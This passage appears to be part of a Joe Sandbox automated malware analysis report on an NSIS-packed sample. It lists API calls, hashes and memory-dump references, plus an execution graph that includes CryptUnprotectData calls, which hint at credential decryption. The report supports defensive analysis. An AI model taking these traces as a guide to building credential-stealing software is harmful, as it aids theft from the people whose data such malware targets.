                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp$C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll
                                                                                                              • API String ID: 3109718747-159582160
                                                                                                              • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                              • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 2979337801-0
                                                                                                              • Opcode ID: de1d189ff9f6a5c963e689051e7e8e5413d3ba02d1c06a9a95e01dfb8d96b1a3
                                                                                                              • Instruction ID: 6320de7363b0a556c6686d7fad26104be245516d8d4479c9f8ff94afb31bf56a
                                                                                                              • Opcode Fuzzy Hash: de1d189ff9f6a5c963e689051e7e8e5413d3ba02d1c06a9a95e01dfb8d96b1a3
                                                                                                              • Instruction Fuzzy Hash: 3051A531D043599B8BB99FB889605AEB7B9EF47354B00425BD504A72C0EF70FEC18B95
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F9724D6
                                                                                                                • Part of subcall function 6F97122C: lstrcpynW.KERNEL32(00000000,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F97123C
                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 6F97245C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F972477
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 4216380887-0
                                                                                                              • Opcode ID: 7b77ef855e1076e410544303313961e4aaf87492d9f1721563c424540808fa9c
                                                                                                              • Instruction ID: 7158db371fb139b45a9d71710163d9d1ac3eb0b1a31da7f95535cae4b51b7a78
                                                                                                              • Opcode Fuzzy Hash: 7b77ef855e1076e410544303313961e4aaf87492d9f1721563c424540808fa9c
                                                                                                              • Instruction Fuzzy Hash: C941CAB0518705DFD7349F29D844A6A77F8FB9A720B004A5EE54A8A5C2EF30E484CF61
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F9721EC,?,00000808), ref: 6F971635
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F9721EC,?,00000808), ref: 6F97163C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F9721EC,?,00000808), ref: 6F971650
                                                                                                              • GetProcAddress.KERNEL32(6F9721EC,00000000), ref: 6F971657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F971660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1148316912-0
                                                                                                              • Opcode ID: b3e833d767e1a639ee4db644b8ecbb7c3a8ad9757f02ea9af9ab7b47fe7e9b9f
                                                                                                              • Instruction ID: 8bb4d06d7d6a45c73c3937e78bbe0f2426b748e52f40920c97e9c38da87274d0
                                                                                                              • Opcode Fuzzy Hash: b3e833d767e1a639ee4db644b8ecbb7c3a8ad9757f02ea9af9ab7b47fe7e9b9f
                                                                                                              • Instruction Fuzzy Hash: A1F0A27220A638BBDA2116AA8C4CC9B7E9CEF8B2F5B110215F6189119196615D11DFF1
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-823278215
                                                                                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                              • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,00403A1A,75923420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-823278215
                                                                                                              • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                              • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                              • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F97116A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F9711C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F9711D9
                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F971203
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: 2799d3495e0ce103bbea1acd6aac1bf2db844e11ca27266d6f0df0e9fbeb91ae
                                                                                                              • Instruction ID: e9ea9781b14d6339b3b7720445c5c5d966f4e8d37964a8c3b4f027e2926e748b
                                                                                                              • Opcode Fuzzy Hash: 2799d3495e0ce103bbea1acd6aac1bf2db844e11ca27266d6f0df0e9fbeb91ae
                                                                                                              • Instruction Fuzzy Hash: D63161B2908311DFEB708F78C965A6577E8FB57720700062AE948DB2D4EF35E8918B60
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.1%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:4.4%
                                                                                                              Total number of Nodes:272
                                                                                                              Total number of Limit Nodes:26
                                                                                                              execution_graph 42612 16b107 42613 16b134 42612->42613 42614 16b11a 42612->42614 42614->42613 42620 348a0188 42614->42620 42626 348a0198 42614->42626 42615 16b1a3 42632 37b62730 42615->42632 42621 348a0198 42620->42621 42638 348a03c4 42621->42638 42623 348a01da 42623->42615 42627 348a01a4 42626->42627 42630 348a03c4 4 API calls 42627->42630 42628 348a01b0 42631 348ac638 3 API calls 42628->42631 42629 348a01da 42629->42615 42630->42628 42631->42629 42633 37b6273f 42632->42633 42691 37b60938 42633->42691 42639 348a03e2 42638->42639 42640 348a01b0 42639->42640 42642 348a7628 LdrInitializeThunk 42639->42642 42651 348a761a 42639->42651 42657 348a7c2c 42639->42657 42663 348a7848 42639->42663 42645 348ac638 42640->42645 42642->42640 42646 348ac631 42645->42646 42646->42645 42647 348acaf9 42646->42647 42648 348a7848 2 API calls 42646->42648 42647->42623 42649 348ac77c 42648->42649 42649->42647 42669 348acf01 42649->42669 42653 348a7628 42651->42653 42652 348a763a 42652->42640 42653->42652 42654 348a7c24 LdrInitializeThunk 42653->42654 42656 348a7628 LdrInitializeThunk 42653->42656 42654->42652 42656->42653 42658 348a7ae3 42657->42658 42660 348a7c24 LdrInitializeThunk 42658->42660 42662 348a7628 LdrInitializeThunk 42658->42662 42661 348a7d81 42660->42661 42661->42640 42662->42658 42668 348a7879 42663->42668 42664 348a79d9 42664->42640 42665 348a7c24 LdrInitializeThunk 42665->42664 42667 348a7628 LdrInitializeThunk 42667->42668 42668->42664 42668->42665 42668->42667 42670 348acf10 42669->42670 42674 348ad540 42670->42674 42681 348ad550 42670->42681 42671 348acf80 42671->42649 42675 348ad550 42674->42675 42678 348ad629 42675->42678 42679 348ad540 CryptUnprotectData 42675->42679 42680 348ad550 CryptUnprotectData 42675->42680 42688 348ad1ec 42678->42688 42679->42678 42680->42678 42682 348ad575 42681->42682 42683 348ad629 